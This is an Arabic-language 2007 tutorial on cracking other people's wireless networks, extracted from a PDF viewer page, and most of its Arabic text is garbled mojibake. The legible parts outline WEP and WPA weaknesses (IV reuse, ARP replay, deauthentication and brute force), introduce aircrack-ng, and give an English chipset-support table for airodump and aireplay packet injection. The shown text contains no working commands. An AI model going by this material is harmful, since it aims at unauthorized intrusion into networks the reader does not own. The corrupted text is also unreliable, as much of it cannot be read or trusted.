howto-hacking wireless networks-arabia
DESCRIPTION
HOWTO-Hacking Wireless Networks-arabiaTRANSCRIPT
![Page 1: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/1.jpg)
![Page 2: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/2.jpg)
http://www.t0010.com ����� ا��رق ا���و���
2
�����א�א����א������ �
� �������������א������ �
ProXy-BrokeN ####################### Br0ken r0x######################
# Lesson : Howto Hacking Wireless Networks step by step # # Author: BrokeN-ProXy # # Page: www.3asfh.net & www.sniper-sa.com # # Contact Me 0nly email: [email protected] # # Msn Messenger : [email protected] # ####################### r0x just do it ############### #####
Hacking Wireless Networks
© Copyright #₪₩~ BrokeN-ProXy #₪₩~ 2007
![Page 3: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/3.jpg)
http://www.t0010.com ����� ا��رق ا���و���
3
�������������������� ����א$��#"!�א$��#"!�א$��#"!�א$��#"!�����א� ���א� ���א� ���א� �������
�()�'�א�&�%��*�
http://www.3asfh.net/vb/
�()�'�א��*�%,�א�&�+*�� �
http://www.sniper-sa.com/forums/
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
T0010.COM
�1�23*�0א/��.�א-�������## (����1�23*�0א/��.�א-����45(����1�23*�0א/��.�א-����45(����1�23*�0א/��.�א-����45(����45����##� �� �� �� �� �php.index/books/com.0010t.www://http
� �� �� �� ���א����+�א$��#"!���67�8 �
--------------------------------------------------------------
aLT3rEQ$Hacker ---------------------------------------------------------------
��W>=א�א����+�:>(א;�:9 �
+���א�*�@��א��?�8/=א�א�� �
'()*+',-+ : اMNـK L+0,ـK 0ـIق ا6FGار Adobe Reader@?< =>;: ا6789ام 0123+/
Oـ;,P8N8ـ0ب وSNا OTدة 63اIWI,Nا X32واNا :Y+ O,YZ [SN ـ6ارFـ2 إT] L+ /+012^Nه_ا اaN2آ' اذه< إdNا efI+ a<= X32اNا [N08Nا:
html.2readstep/acrobat/products/uk/com.adobe.www://http
![Page 4: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/4.jpg)
http://www.t0010.com ����� ا��رق ا���و���
4
� �+����)�'�א����+����)�'�א����+����)�'�א����+����)�'�א���WWWW� �� �� �� �
��(=A WARNINGKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK�٥� �'���D��1א����)�������EFא���KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK�٦� �
� ������EFא��'���Dא�FWLANE� �� �J�(��-א�K(�&�� �� Lא�!M ����EFא��N�7�$א�'���@� �
����EFא��'���Dא��O�D�KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK١٣� �� ��N�5����Wired Equivalent Privacy�� �� ��N�5�����Wi-Fi Protected Access�� �
��V*א�E�Xא�TUVWS"אRS"א'�)Y��J���(א��א��א#Zא�[��KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK١٥� �� ��6V���\�F�� �
�]��!������5�� aircrack-ng�KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK��١٧� ����5��wireless tools �_א)W������`�E"Oa5��V*��)�����KKKKKKKKKKKKKKKKKKK�١٨א_�!� �
c����Xא��'���D�45א��d3e��KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK�١٩
�R�-�4א���'�:�9א(�A[ Monitor Mode]�KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK�٢٠� ��9"Sא�i�j/א���(�kThe attack method 1�KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK�٢٢� �
�i�j/א���(�k��!�aא��The attack method 2�KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK�٢٦�� ��l�mא��KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK�٣٢
![Page 5: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/5.jpg)
http://www.t0010.com ����� ا��رق ا���و���
5
�Y(א�i>=א�א��א-��6,�א-��6,�א-��6,�א-���Z:,6א!�Z:8א!�Z:8א!�Z:8א!8Eא�;�E�������אM�X��"n���8�Zא�+���0*1��o�*א���א�pSא"��KK�� �� �"������qא��rM�sp"M�rM�)(�MHacking��������Dq���0q6�&�(����)W�("�T)t����"�OY���06�&�(����)W�(��()��"u�vFE�
qq�:"��(�Zw�qq��xuSא����،�����L�qq*א���qq��r�qq�!�rM�zqq*lMN"Sא����qq�����{qq� (�|=qqא��FF��$��qq!M��}��qq�M��qq�/א���qq(uS����{��KK���!Mא-��6,M�������������������Dq!�[�_�q��*�qA"��q(|�א�q=א'�"�Sא'�א�q~aא��R�q�:"��q6\!Sא���q����q(א/�א��=<����q�&א�
"�,���e�&-א�+���EEא-��6,�@ �� �
{�e���)&��+����@(א_����4���)����]��&����!���r����"�0>=א�א����+�������rא�"�(���W�ZM>=א�א��W� �� ��� ��_$"M�W&W���_�����EFא��'���Dא��א�#Z$�qא��Wireless�K� �
� �_��!����W�,6�V-א"�'���D�8א�E�(א���א�� �pא��"���S����8���K� �� ��_�a����W��!�[א����'F��+�3%M�6א��&����،��)m�TR"U-�5'�א�Dא�"א��D�����EFא��'��� �������������M��Vא�#Zא�������Vא����6��@�r4�3������*<�)W�(�$"��K� �
� �����������*���!�������4�~Dq�5��q��א��5�Dq'���א��q<�J�q����rwא/�M���.�5�qא��&�K"א�a~�א'�א-��א��q6\!M�[�T)qWא�
��@�K&p����!�KD����V��r�*�&��(�'���*��]���*���א-&��Sא��V6\!"��V���K� �� �
��7�Z����/���15א���������������q���Y-�4א�~Dq�5�����qא��qא�[�"� �q����q\!א���� ��[�O�5�4�e�0��.���q5"��zq*lM���qqq�����,6��qqq-א�+��qqq@�3א���qqq�(�rM��T���qqq~-א�v"�"�|)qqq3���qqqא�&������������qqq(�6���V�qqq�!M��(�qqq ���V�����qqq@"�V�
���*�� ����j1א�eR�[��6<��-א�&����"א"����FEא��N")א��[��� ���K"א� �
� �
��(=A�KKKKKWARNING�
![Page 6: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/6.jpg)
http://www.t0010.com ����� ا��رق ا���و���
6
���Dא����Dא����Dא����Dא�����EFא��'����EFא��'����EFא��'����EFא��'F�F�F�F�WLANEEEE����WWWW� �� �� �� �
s�%M�����������������������q����Fא��6�q���q<"��q����5�qא�&�S���zq��"��)(�(�r����|M�[�4�*�����rא��dYDא����rwא�
�N�qqq6�4א�qqq��5א�|M�r")qqq�"�zqqq���(�"M�4qqqE�(�rM� � ��qqq(�8"א�qqq!"#א���)qqq(��0qqq(����qqq!#!$א�[�s�7qqq�א��qq����t�qqk��qqא'�@Oqqk��5�qqא�rא����5�zqq�1��(�e��qq-א�r�qq�����s�qq%M"�����qqא��'�qq1�'F��qqא��NFqqZ�0qq�!�-
��!#!$���N�7�F��N�6א��iא)Y�E�8א��kSאK� �
5"qqq<�4qqq��Dq�8א�q<"�T)()א����*�����'�א�����qא�qqq������qEF=א�����4א���FWLAN \wireless local
area networkE�����qqq(Rא��א�T��qqq@:��qqq1��qqq!#!$א����Dqqq��N�7qqq�$����qqq�*�� qqq�"���Fradio�qqq<�s6=��א�
frequency/RFE�FES��1א�N�7�$א����$)���K� �
����M��*Z����8א�*����א���qEFא�����א����*���iא)Y�Eא��V�e�dYDא�� � ��(�X��5א���S��1א�T���1�8Ve���qq!#!$���K�4qq%"�)qq�"�������i�qq1�N�qq�����qq&א��;�qq�M� qq���[�`$wא�'�qq���9:��*Z��qqא����qq�*א��R)qq1��٢٠٠٥�
"�z�1��*Z��6(���*���א�*����א��&�7*1,���t���(�N�7�F����W� �
����EFא��'���D��1א����)������EFא��'���D��1א����)������EFא��'���D��1א����)������EFא��'���D��1א����)��
![Page 7: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/7.jpg)
http://www.t0010.com ����� ا��رق ا���و���
7
١١١١� J� J� J� J ����EFא������� ��������FFFFwireless computer cards����EEEE� ���'�א��6������א�����EF� ���'�א��6������א�����EF� ���'�א��6������א�����EF� ���'�א��6
������"M�N�6א��.�V����TR�W���r����)�"���������r����)��"M��Z��.�VW�|Me�p��0����"�����q�� ��q<�|�q=��א�A8W��Z�"M�8�ZאR�8tא�<�z�1�K� �
�8��EF�5"'�א��Lא�!M�8��EF�5"'�א��Lא�!M�8��EF�5"'�א��Lא�!M�8��EF�5"'�א��Lא�!M�W�W�W�W� �� �� �� �
� �
���� ��TUVW����8��E$�'�5א-�
��\�F�W�eq����8�]�)��8��E$�'�5��V��)W�(��*(#*E���e����N�6א��TUVWM��.�Vא�� ��� �
�TUVW���8��E$�'�5א�����6!��01PCMCIA
����"א�����6!��01� �TUVW����8��E$�'�5USBא-�
![Page 8: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/8.jpg)
http://www.t0010.com ����� ا��رق ا���و���
8
٢�� J�� �!�N�%א���Faccess pointEW�� �
����א$!#!������D������EFא�����א��'���D�47א��K�����*Z�qE����!�z�1�|��A�Xא'�א��t� ������*������M����������������������Dq����0�7q���q%�Z���1�*q%���q6����������T�t� א�����Z�8t��1>�א�N�%א���� �!����D��4�����e
0�p�M�N����E���1 �'�א .
""""�(�k�v�D��i��!�`�E�(�k�v�D��i��!�`�E�(�k�v�D��i��!�`�E�(�k�v�D��i��!�`�Ee��V�(����5��e��V�(����5��e��V�(����5��e��V�(����5��qqqq+����8>=א�א����+�8>=א�א����+�8>=א�א����+�8>=א�א�� �� �� �� �
� �
![Page 9: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/9.jpg)
http://www.t0010.com ����� ا��رق ا���و���
9
�'�qq�*����K���qq�����qq�Yא�� ���qqV�eא����qq��)qq5�� �א$!��Dqq�������qq/א�����qqEF،�"א�qqEא"���qq�،���qq1R"�،��r�qqeא�4a��'��En�W�� �
Institute of Electrical and Electronics Engineers (IEEE)
Internet Engineering Task Force (IETF)
Wireless Ethernet Compatibility Alliance (WECA)
International Telecommunication Union (ITU)
����t��R�VW�T)&���#D� J�(��-א�)������،_Fa������4q6&א��'�q1�6��i�q��� IEEE ����4q�!��q���5�Kq(�&����q��'������qZ��9:�.�qVW�F��_Faq א-&����،،��������qSא��qA�;��qא��"M��q(�(Rא��'�qW���iא)Y�qEא;���א�qE�E�q�5"K
'$�7�F��N�E�א�����E"�iא)Y�Eא����z��"��K� �
،����EFא��'���Dא��J�(�����(� ��;�*�M 4a��'��En��r�e IEEE ����q�� א��T�אR�q����qV�������q *א����q1"�،|RR#א��r��Sא"�،��(���"�، ����EFא��N�7�$א�'���D��T)(�e�x�ZM. � �
��)��K(�&�J�(��J�(��J�(��Jא-�&�)�Kא-�&�)�Kא-�&�)�Kא-
![Page 10: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/10.jpg)
http://www.t0010.com ����� ا��رق ا���و���
10
���'�א������D�4א�a����'���Dqא��K�*7q���� �، ����qEFא��������Xqא��'�e��q-א_�:�9אR�*�qEא��q���¡�Lא�q!M��6qp��'�!������:��N�Eא��E �<�1������EFא��'���Dא��Lא�!M����L�!�45��1�� ����T=�*������*E".� �
١�K�� *א���&Eא"�����EFא��N�7�$א�'���@)WWAN (W� �
��'�q�*����q¢�l WWAN �������q1�����qE$�'$�7qא��J�qE����q��,�)Y��q-א ��&����'�א�&����qא�Dqא���"M�T)q��%�mא�'���Dא�K�� �
"{k�*��Y(א�i>=��א��1�'$�7�$Eא��� �&Eא"���eא�~W�N")א�"�r)-�4אa��،��� qא-�א��iא)Y�Eא�NFZ����"M�'��tא/�א�TR)&�� ����EFא����)mא�|�e���4������T�e���M�K!\��6א�6�S��א�7*����1א- �
'��*���`�&£� WWAN �8!�aא��������!\��6א���4א�F2G�E�����8!�qa�4א�qא����q6\!M��6�q�� Global
System for Mobile Communications �(�GSM�)�"�، Cellular Digital Packet
Data �(�CDPD�)�"�، Code Division Multiple Access �(�CDMA�)�. �
�N�7א��'���@����N���!F��R�Vא���e���� �8!�qaא���4א��������R")q��N¤�qo��q�!���:��V�q&��cq�� �Xqא�"�،�T{eא���61���_�����i)1�9:��e�p��� �V�&��,���9:��e�pא��_�E����� ���E�X�2א���a���9*��'�א���4א�:�،
Oe�� ��&א��N���N¤�j����!���א�:�K ¤jD� ITU 2��a�4א��j���8��61�}������(� ����D*�. � �
٢K�)�WMAN�(�Wireless metropolitan area networks W� �
��'�q�*����q¢�l WMAN ���������qE$�'$�7qא��J�qE����q��,�)Y��q-א �������q� *���6qp�TR)q&��� qא����,q����!)�F"M��*�&���*()��[��������¥r����T)1�,��_Fa���4aא- �� �i�1�r����[�"M�8&��W�i����6p�E���r")q��
`���Sא�'F���Kא���M���t"�א���F'�א�*�OW��"���E�3אm �� א�������א�&�����-(�5 �
��9:��e�qp������'���Dq���q� �،cq�u� WMAN rM �������[�cq�u"�،�����qא��N�7q�$א�'���Dq���1)q5�4q6&�N�7�$א����D��T�Wn-א��� m& �4א������ �����א��K� �
Lא�!MLא�!MLא�!MLא�!M ����EFא��N�7�$א�'���@����EFא��N�7�$א�'���@����EFא��N�7�$א�'���@����EFא��N�7�$א�'���@
![Page 11: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/11.jpg)
http://www.t0010.com ����� ا��رق ا���و���
11
'���@�i)Y��� WMAN ���4q�*��;א�q6א���qA��&@Sא�"M��(�(Rא��א��א��Sא �'�q!���)RUqא�Rא� ������zq�1��q"א����'�א�N�7�$א��1�����EF)���א�* ��@��e���X�1'�������1 "א����9:!#!���:�N�%א���,�)Y��6��K� �
�����4qa��،�q���¡�'�q�*���iא)Y�qEא��q�� multichannel multipoint distribution service
�(�MMDS�)� " local multipoint distribution services �(�LMDS�)���4q61��q1�6���6����،
IEEE 802.16� ���N�q%א���J�(�q�- �����q ��[���q *א���(�q1�8��qEFא�������=q<��(�q ��)q������'��q%א-�א��('��*��� .א� �
٣�Kא���������EFא��N�7�$א�'���@)WLAN (W� �
��'�q�*����q�l WLAN �������6qp�����qE$�'$�7qא��J�qE����q��,�)Y��q-א ����q�����q� *�F���4��qE�zq�1��6p�،N�a-אz*���� ��4a��i�1�r����[�"M�،�5�@�"M���KE� �
��q� ��'���q@�iא)Y�qEא WLAN �-א��q���-א�[��������q�5����q��5�r�q���2q���x�qZM��5�q�M�[�"M��q��n
���_����q!�TO�q5�'F��qא��������q@�9:��e�qp����"M�، LAN ������q��r��)Y��q-���6א�q(�zq���TR�qW�� ��[�4q6&א�����¡�'��"M�["�;�*��������6pא�¡� ��א�K� �
���'���Dq���q� WLAN �4q6&��rM �,��(�q ���K�'���q@�[ WLAN �����4q6&א��'�q ��47q�����qE�ESאEFא������F'��� �� ��TUVWM �������q�W��Z�iR�q��TUqVWM�"M��q(�(Rא��N�7qא�����q@�E�����8��qEFא��N�q%א�����q�!� q�
��j5�46&��Xא� ����Dq�����E�ESא���*����'��K�,�� �'�א�&�46"א�q@�[ WLAN ����9:�Oq\!�L�q!��q�O\!K�� �
��TR")qq���qq� *��[�,�)Y��qq��T)qq&���qq� ��'א�lnqq���qq1���4qqa��،��N�7qqא�����qq@א����Dqq(�rM�،�qq��n�� �r"RN�%"����!�iא)Y�Eא����Dא��R�א���9:�N�%����¥LאR���*<���(א���u:�،�.� �
�[i�1 1997��R�%�، IEEE �}�����z�1١١}٨٠٢'���D��WLAN �����'�q!���،�"א�=|�§�4q�!��1�qE�R)qא����١ �9:٢��q�!�a��������~����K���}�q��6���_�q�e"b٨٠٢{١١�����)q()א��}�q��-�0אq!�5"�")q�(�|=qא�� �� ��q-א����q(�،�
��<�)��x�7���1����'�!���٤}�٢��~���������z�1���!�aא�#١١�RR!��4א� �W~U��<��K� �
���<��Z��)()W�}����a١١}٨٠٢،�����<�)q��x�7q���1����'�!�����~�����zq�1��q�!�a�����q���q ٥٤א�=|�§(�R!��4א��RR#٥א��~�W��U��<.� �
� �
![Page 12: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/12.jpg)
http://www.t0010.com ����� ا��رق ا���و���
12
٤�K�)�WPAN�(�Wireless personal area networks �W� �
'�qq�*����qq�l WPAN א�qq��,�)Y��qq- �TUqqVW����qq�e�5�����qqE$�'$�7qqא��J�qqE��F4qqa�� PDA�،TUVWM�"M�،�(��mא�Kא����6 א/�א������� א����q;� (POS) �א-��א��e��6p�T)W;�א�&�46א��E�87qYDא��6
POS ;א������< ��e����z���i)Y����١٠א�=|�§�����-��M���K� �
_����� '��*��� WPAN 8<���E�ESא Bluetooth &@Sא;��"א�q6א���qA����K��q�*�� Bluetooth ���8q<i)Y����4�������()����*�� �z���'�e����9:�'�!�����א��א��אR)�)���*��4א�S٣٠א_��)����K� �
�'�q!����4�!��� Bluetooth �����qtא���"�+�qא��"�rא�)qא���q1"�����q�*����(�q ����q( Bluetooth ����q����q1�6��4q�� ����z6�q���q�*���qV���q6=��א�V� Bluetooth Special Interest Group (SIG)���Xqא��،
'�D! '��%א�� Bluetooth ��٠}١א�%(א�i�1�١٩٩٩�KO~%��� !��6p�TUVWS�4�()4،����4%א�D� �_א)WF١4�M�"M�#��E�;א��6א��A��&@S���'�k���,�:!�D;�א��)Y��6����� �،. � �
���'�q�*����(�q ��)q������ WPAN���qEM�، IEEE ���4q6&א���q1�6١٥}�٨٠٢��'���Dq�� WPAN ��i�q�������J�(�q����(�q ����=q<�4q6&א���q1�6�� WPAN��'��q%א���*�Rא_�:�9qEא�، Bluetooth ��א)q%1.0 א�.
����،�qq�� א���FV�qqEא���qq�©�،)qq��&����!���qqא��Dqq~���4 א)qq<Sא`�א��qq�t����qq/=��א-����qq�©�8qq<�J�(�qqא�:�N�7א��'���@� ��{eא����NR،�"א���.١١}٨٠٢א- �
��W�W�W�Wא-7(��א-7(��א-7(��א-7(�� �� �� �� ��("R��<�+�1� ����("R��<�+�1� ����("R��<�+�1� ����("R��<�+�1� ������������������������������������W�W�W�WTeT_TaT�)(U6����)(U6����)(U6����)(U6����8����WWWWא�z�1��~pא��א���א�����8א�z�1��~pא��א���א�����8א�z�1��~pא��א���א�����8א�z�1��~pא��א���א� �� �� �� �
WLAN=highlight&27438=t?php.threadshow/forum/net.arabhardware.www://http
���������������L�qp�-א� q���KqpM��"���3�p�� �א-��z�1���)1����������������L�qpא-�RM"�L�p���W�&��א��7��א�q���KqpM��"���3�p�� �א-��z�1���)1����������������L�qpא-�RM"�L�p���W�&��א��7��א�q���KqpM��"���3�p�� �א-��z�1���)1����������������L�qpא-�RM"�L�p���W�&��א��7��א�q���KqpM��"���3�p���z�1���)1�MMMM����qp����qp����qp����qpא-�RM"�L�p���W�&��א��7��א�0W����`�E�|=א����e0W����`�E�|=א����e0W����`�E�|=א����e0W����`�E�|=א����eK�K�K�K�
![Page 13: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/13.jpg)
http://www.t0010.com ����� ا��رق ا���و���
13
)W�(,1�!��_�����א����$�5'�����)����)Y����'�א���q6<"�����EFא-�Dא��O�D����WEP , WPA
��`�E"6V*1�����!��4�7�������KK� �
١� J���N�5����Wired Equivalent PrivacyW�� �
��RM��RM��RM��RM��)qqV&��[�r�a��qq��*��IEEE�������qqא�Sא��k�qqY-א��qqVWא���[�����qqEFא��'���Dqqא���@�Dqq<��،�c�=qq��������N�q5��"�����67����>=��א/������������������������qא��'���Dq����q�e��-���%�7אqmא��qE�0אq��1��q��kM��q(�
FWired Equivalent Privacy�E��+����$�`�1�|=א�"WEP�K�� �
�N�qqq5��"���)qqq6���Z�zqqq�1�0qqqא�.��WEP���z1)qqq��O�Dqqq���qqqא1�*��[�RC4��{qqq��A"�'�qqq� &-א�O�Dqqq������%�7qqmא�،���qq� �TOqq Z�T�qq~��0qq�e�KDqq���zqqא5��F)�qqk�N�qq5��"א�א��=qq<�i(qq(��.�5�Vqq�����qq5�
��)Y���0�~��א�*\���T����1א���O�Dא-�(� 64 bit �"M١٢٨ bit `�E"T�~aא��v�@א�� (�E�4�D��K� �
�[�R�W���T�~aא�[Initialization Vector ]�IV�qא��IV�O�D��T�����<�٢٤�bit�L�!����RC4��8q<"����)Y�Eא;�א�E������٦٤�OR 128�������q���q�e�5��q�65� q6o��q��R�������IV����q"/=א�א��(�����q&(�
�,���٥٠٠�K�M�IV8����r�����9:�K�� �
�)qq&��!�rM� � ��qq!�cqq�u�cqq�٢٤�����qq�t�qq�R�����qq<��qqE�5}�:$�"��١٠)���qq��=qqZ����א�)���qq��rM��qqWא���qqא����<O�Dqq�"�rM�4qqWM��qq���T��7qqא��s�qq������`�qqE��qq5M�4�Dqq����qqq�0א�qq��5���v�qq@١٢٨אbit����"٦٤bit�r�Dqq1�
���0���r�e�&����i)Y����ª"��V(K� �
��q١٢٨א������������O�D��N"Sא�;Uא��,tUW����0!�����١٠٤����L�q!������RC4�����q<�8!�qaא��Uqא�"�IV���q<"�٢٤���q�����������O�Dq��zq�1���7q���V������١٢٨:uא��&�q*�����q�:"��q����qq���٦٤���q��������N"Sא�,tUqW��q��r�q���iFqא���Jq�!�
�O�Dqq�٤٠��L�qq!��qq���qq��RC4���qq<�8!�qqaא��;Uqqא��"�IV��qq<"�٢٤���zqq�1�47qqA�vא���V�qq&א��u:��qq��٦٤��qq���<�[�0�5�iF��WEP header،��iא)Y�Eא����א�*�{�)���4א��V-אWEP�z�1�WPA�r$�WEP���« �(�����EFא�����Dא��z�1��O����¬�F��O���&(����Dא���K� �
����EFא��'���Dא��Oq�D�����EFא��'���Dא��Oq�D�����EFא��'���Dא��Oq�D�����EFא��'���Dא��Oq�D�
![Page 14: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/14.jpg)
http://www.t0010.com ����� ا��رق ا���و���
14
٢� J��N�5����Fi Protected Access-WiW�� �
�V��V��V��V��i�1�N�5א���5�8!������٢٠٠٣>=א�א�������*�Sא����D-�4א��qWEP�� �WPA����qq����7q�Z�8אq<�Wi-Fi Protected Access��������"��q(�63���,���qE"��q�(� א���=q<��1)q��"�6< W
WPA with RADIUS� �{�3��,�q(�k��q1}�א��)q��"��eOqE�J()q�*�������� ]�>=��א� �)���)���rא1$��R�6]�א�)Y��q-א�'�(�<���
����:�R)7� 4(�k�v�@�9א��v�D"�א�����1�s�p>=א§�0!S����mאK��� �
WPA with PSK [pre shared key]
�&�$�6"�">=��א� �)���>��8Eא��a5SאrM� � ��!�������q���qVe��M�R)q1�0q6�5�|M�`�q&!�٨�9:�٦٣��"M�`�q��٦٤������Hexadecimal K� �� �
���qqqא�7qqq&��אZ#א����s�qqq%M�2qqq���_א)qqq��&���qqqa5M�'�qqq���&�Z�N�6א�.qqqEא���)qqq���"�=qqq<�z6�qqq��"��qqqV
��q����7q���� TKIP א�mא�.Z�8אq<"���qq���qq���qq���qq�Temporal Key Integrity Protocolא�"�Xq���4�Dq����6��qq��O�qq~����qq(�������i)Y��qq-�4אqq����qq��R��qqE���Y(א�iא�qqEא�� qqEא���i)Y��qq��4qq���O�Dqq����s���qqא���K�����4a��WEP���(�k"�IV�4V�א�����8������"�i)Y����4���������<"���0�(����5K� �� �
�e�p�������4qa��x�qZM�'�*��qA�9:�Message Integrity Code�q����4=|�"א�q61� q*-� qp"�ARP
Replay Attack��������Nא�i)Y��q������qE$����q@�R�qW"�0q����[�0q��� ��r�q������8qא��"��WEP�q<"א��=������ ��0��61����L��(�i�j/אIV������_��q(M�cq!M�9:��e�qp�����L�EM�4�D�����Dא���(��c���8������"�
rM� � ��qq��qq<�i)Y��qq��=א�������R)qq&א�� qq6o��)qq����qq&(�4~�Dqq(�)qq�M��qqV�e��qq�����Dqqא��r:��qq����[�i�qqj/א������~u:�i.$�0q!S��4א������������IVא- ��+�Dq�"����Dqא��cq��"���)q(����q*56o��q�� IV����cq�e���0אq�e�r�q�(�i.$�
�.�V�8�,�א�D �)1��J�5Sא"����EFא�����D����*(���K�� �� �
��q��� W�!��V-אWPA�r�������r"א��א+�>���؟؟�5����)���Vא�,�>�4��������&!�V�(����5������z6�q(�i�qj<�iא)Y�qEא�� qEא��Deauthentication Attack��������Dq�����(R�qW�-�47אq����q&(�
������������qqEFא�����Dq���i)Y��qq-א�N�qZR��qq��61��q�����)qq���r�Dq1��qq�!���T�q��r���Dqq(��V�q�©"�����qEFא�qqא���qq\3�8א��qq<"Xqq-א�,qq��O�Dqq����s���qqא��NR�qq����qqV�e���qq(��i)Y��J�qq5S��5"א�qq/א��<)qq&���qq*(���
��������0q?א�i�qj<�iא)Y�qEא�� qEא���O�Dq�)&�cq�(�N"�q§brute force attack�������q6��N"�q§��qא���������������q&(���)Y��q-א�R��qE�����z�1�)6������Tא�&(�i�j/�<�v�®"����Dא��O�D�����)Y�א����E��Rא-�
��R��E��א�u:٨V��������z�1��V��(�0!א�O�5�N�6����Z���K!�'�א� �
![Page 15: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/15.jpg)
http://www.t0010.com ����� ا��رق ا���و���
15
١K �J�*���i�\!�0��1��5���N�6�������65�.�VWK� �٢K � ��{eא����8��E�$�'�5Aircrack Tools
٣K Aircrack-ng Tools
�45�J��e�0���[���qE&�5�46'�"א)����Jא!�q!���zq�1�Aircrack ������ctא�q@�)q*1��=q���q5�c�=q���5(����4@�א;��M!�0)(��1א����rM���"�'������J�*����1)(�c�u�9:��e�p:�]��!��K� �
� �����x�qqE��5�Dqא����qqEא��qqV���q��{qqeא�������q*��� NETGEAR Or Linksys K�'�5�Dqqא���qq�א¯�
���§�Dqqא��L�qq!��qq�6<M��qqW�)�[Chipset]��8qq<�rS�_א)qqW��qq6V���§�Dqqא��L�qq!��qq&!�`�qqE�Xqq�4א�qq<�R)qqA�M�]���i�$�K(��1א��!� �
�����q<�J�*qq����1)q�"�]��q!��1א��)qq���§�q@�4�qeM��8Atheros�����]��qq!א��� q����zqq�1�;�q*��iFqא�א��=qq<"�org.ng-aircrack.www�� �
The best chipset nowadays is Atheros. It is very well supported under Linux, and also under Windows (PCMCIA/CardBus only). Neither support any USB wireless devices. The latest madwifi-ng patch makes it possible to inject raw 802.11 packets in either in Managed and Monitor mode at arbitrary b/g speeds.
�5���N�6��.�VW� ��J�*���i�\!�0��1�
$�'�58��E �� ��{eא���aircrack tools
aircrack-ng tools
�[��V�)Y��!�`�E�Xא'�א�"RSא"�TUVWSא�[��V�)Y��!�`�E�Xא'�א�"RSא"�TUVWSא�[��V�)Y��!�`�E�Xא'�א�"RSא"�TUVWSא�[��V�)Y��!�`�E�Xא'�א�"RSא"�TUVWSא�א#Zא�א#Zא�א#Zא�א#ZאJ���(א��א�J���(א��א�J���(א��א�J���(א��א�
�6V���\�F��6V���\�F��6V���\�F��6V���\�F�
![Page 16: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/16.jpg)
http://www.t0010.com ����� ا��رق ا���و���
16
�[����>q=א�� �q!א��� qq���q�eא���,�א���qq"'�א-q(�N")qqW]��]��qq!א��� q�����qq��u�Z�q��N")qqא��[�"�qqא��L�qq!�46Dq(�q�chipset��1R�"��airodump���_��(M"�J�*���"�.")*(����aireplay �J�*����K� �
Chipset Supported by airodump for Windows
Supported by airodump for Linux
Supported by aireplay for Linux
Atheros CardBus: YES PCI: NO (see CommView)
YES YES (driver patching required)
Atmel UNTESTED 802.11b YES 802.11g UNTESTED
UNTESTED
Broadcom Old models only (BRCM driver)
YES IN PROGRESS (Forum thread)
Centrino b NO
PARTIAL (ipw2100 driver doesn’t discard corrupted packets)
NO
Centrino b/g NO YES NO (firmware drops most packets) ipw2200inject
Centrino a/b/g NO YES NO (See this thread for alpha injection support.)
Cisco Aironet YES? YES NO (firmware issue)
Hermes I YES YES NO (firmware corrupts the MAC header)
NdisWrapper N/A Never Never
Prism2/3 NO YES YES (PCI and CardBus only, driver patching required)
PrismGT YES FullMAC: YES SoftMAC: NOT YET
YES (driver patching recommended)
Ralink NO YES (rt2500 / rt2570 / rt61 / rt73 driver)
YES, see rt2500, rt2570, rt61 and rt73. Also see Ralink chipset comments later on this pager for important concerns
